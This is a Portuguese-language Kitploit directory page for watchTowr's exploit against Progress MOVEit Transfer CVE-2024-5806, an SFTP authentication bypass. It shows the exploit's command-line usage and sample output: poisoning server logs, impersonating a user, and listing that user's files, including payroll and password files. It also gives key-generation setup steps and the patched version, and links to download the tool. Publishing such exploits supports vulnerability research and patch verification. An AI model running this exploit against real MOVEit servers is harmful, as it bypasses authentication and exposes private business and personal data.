Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
watchTowr-vs-progress-moveit_CVE-2024-5806 — Exploit para o CVE-2024-5806 | Kitploit
Ferramentas/GitHubGitHub/watchtowrlabs/watchtowr-vs-progress-moveit_cve-2024-5806
Autenticação e AutorizaçãoAnálise de VulnerabilidadesExploraçãoColeta de InformaçõesSegurança WebTestes de Penetração
GitHubwatchtowrlabs/watchtowr-vs-progress-moveit_cve-2024-5806

watchTowr-vs-progress-moveit_CVE-2024-5806

Exploit para o CVE-2024-5806

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
4542há 2 anosRevisado pelo Kitploit

CVE-2024-5806

Exploit para Progress MOVEit Transfer CVE-2024-5806. Veja nosso post do blog em [TBD].

PoC em Ação

Veja --help para, bem, ajuda. Uma execução típica deve ser assim:

root@kitploit:~
> python CVE-2024-5806.py --target-ip 192.168.1.1 --target-user user2 --ppk id.ppk --pem id
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        CVE-2024-5806.py
        (*) Progress MoveIT Transfer SFTP Authentication Bypass (CVE-2024-5806)
          - Aliz Hammond, watchTowr ([email protected])
          - Sina Kheirkhah (@SinSinology), watchTowr ([email protected])
        Note: We (watchTowr) aren't the original discoverers of the bug, we just reproduced it and wrote the exploit
              in order to enable proactive protection of client attack surfaces.
              We will update with proper credit when available.
        CVEs: [CVE-2024-5806]

(*) Poisoning log files multiple times to be sure...
..........OK
(*) Waiting 60 seconds for logs to be flushed to disk
(*) Attempting to authenticate..
(*) Trying to impersonate user2 using the server-side file path 'C:\MOVEitTransfer\Logs\DMZ_WEB.log'
(+) Authentication succeeded.
(+) Listing files in home directory of user user2:

-rw-rw-rw- 1 0 0 1.4M Jun 11 11:39 stocks.xlsx
-rw-rw-rw- 1 0 0 2.4M Jun 13 13:32 customer_list.xlsx
-rw-rw-rw- 1 0 0 2.3M Jun 15 12:16 payroll_Jun.csv
-rw-rw-rw- 1 0 0 1.2M Jan 21 10:03 my_signature.png
-rw-rw-rw- 1 0 0  304 Jun 17 17:29 passwords.txt

Configuração

Para executar o exploit, você precisará de um par de chaves nos formatos PEM e PPK. No Windows, você pode usar puttygen para gerar esses arquivos. No Linux, você pode usar os pacotes openssh e putty-tools. Basta pressionar Enter quando for solicitada uma chave.

root@kitploit:~
$ sudo apt-get install openssh-client putty-tools
$ puttygen -t rsa -b 2048 -o putty_key.ppk
Enter passphrase to save key:
Re-enter passphrase to verify:
$ puttygen putty_key.ppk -O private-openssh -o id_rsa

Versões Afetadas

Esta vulnerabilidade está corrigida na versão 2024.0.2 do Progress MOVEit.

Autores do Exploit

Este exploit foi escrito por Aliz (@AlizTheHax0r) e Sina Kheirkhah (@SinSinology) da watchTowr (@watchtowrcyber)

Siga watchTowr Labs

Para as pesquisas de segurança mais recentes, siga a equipe watchTowr Labs

  • https://labs.watchtowr.com/
  • https://twitter.com/watchtowrcyber
  • [link do blog TBD]
Baixar ferramenta